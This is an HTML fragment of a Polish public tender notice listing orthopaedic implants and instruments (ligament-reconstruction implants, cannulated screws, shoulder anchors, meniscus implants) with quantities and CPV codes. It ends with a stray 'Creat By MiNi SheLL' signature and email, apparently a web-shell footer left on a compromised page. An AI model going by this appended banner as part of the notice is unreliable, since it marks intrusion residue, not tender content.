18.	Wkrętak do śrub sześciokątny kaniulowany s 5,0 	szt.	1
19.	Osteotomy typu lambot szer, 10mm , 13mm	szt.	2
20.	kleszcze do cięcia gwoździ  max O 6mm	szt.	1
21.	piłka Gigli 400mm	szt.	2
22.	Wkręty do kości korowej samogwintujące z gniazd. sześciokąt -kaniulowane HA 3,5 x 12-40mm	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Implanty do rekonstrukcji  więzadeł I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Implant do rekonstrukcji więzadeł krzyżowych 		szt.	35
2.	Śruba kaniulowana, 	szt.	50
3.	Wiertlo kaniulowane 	szt.	2
4.	Drut z oczkiem do prowadzenia przeszczepów		szt.	4
5.	Śruby biowchłanialne  		szt.	1
6.	Tytanowa podkładka .		kpl.	1
7.	 Implant  do stawu obojczykowego  kpl.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Kotwice do barku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rotatory- średnica 5mm, 	szt	45
2.	Rotatory- średnica 6-6,5mm, 		szt	6
3.	Rotatory niestabilność średnica 2,8 - 2,9 mm 	szt	8
4.	Kaniule do barku przeźroczyste o średnicach 5-8 mm, długościach 45-90 mm		szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Implanty do rekonstrukcji  więzadeł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Implant do rekonstrukcji więzadeł krzyżowych  		szt.	42
2.	Śruba tytanowa średnica 6-11mm, d	szt.	20
3.	Śruba kaniulowana, 		szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Implanty do rekonstrukcji łąkotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Implanty do rekonstrukcji łąkotek - system 2 implantów,   Wymagana próbka*		szt.	110.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com